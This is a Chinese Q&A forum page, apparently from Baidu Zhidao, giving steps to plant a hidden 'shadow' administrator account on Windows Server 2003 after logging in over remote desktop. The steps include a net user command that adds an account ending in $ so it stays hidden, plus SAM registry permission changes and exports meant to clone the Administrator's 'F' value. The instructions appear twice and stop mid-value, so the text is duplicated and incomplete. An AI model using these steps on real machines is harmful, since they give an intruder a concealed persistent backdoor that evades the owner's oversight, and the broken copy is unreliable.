2003隐藏帐号问题
来源:百度知道 编辑:UC知道 时间:2024/09/21 08:38:41
当登陆进3389以后--
先建立 cnlnfjhh$ 用户
c:\>net user cnlnfjhh$ wrsky /add
//后面加$ 是为了使在 控制台下用 net user 看不到.
然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组,
把"权限"->"完全控制"->"允许"打上勾,然后确定.
这样就可以直接读取本地sam的信息
现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$
查看默认键值为"0x3f1" 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 为cnlnfjhh$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,0
先建立 cnlnfjhh$ 用户
c:\>net user cnlnfjhh$ wrsky /add
//后面加$ 是为了使在 控制台下用 net user 看不到.
然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组,
把"权限"->"完全控制"->"允许"打上勾,然后确定.
这样就可以直接读取本地sam的信息
现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$
查看默认键值为"0x3f1" 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 为cnlnfjhh$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,0
这里有很多录像教程,一看就清楚了:
http://www.baidu.com/s?ie=gb2312&bs=%D2%FE%B2%D8%D5%CA%BA%C5+%C2%BC%CF%F1&sr=&z=&cl=3&f=8&wd=%D2%FE%B2%D8+%D5%CA%BA%C5+%BD%CC%B3%CC&ct=0
其实隐藏系统帐号,用工具即简单又方便
百度:
http://www.baidu.com/s?ie=gb2312&bs=%D2%FE%B2%D8%CF%B5%CD%B3%D5%CA%BA%C5+%B9%A4%BE%DF&sr=&z=&cl=3&f=8&wd=%D2%FE%B2%D8%D5%CA%BA%C5+%B9%A4%BE%DF&ct=0
2003做影子账户不跟XP一样吗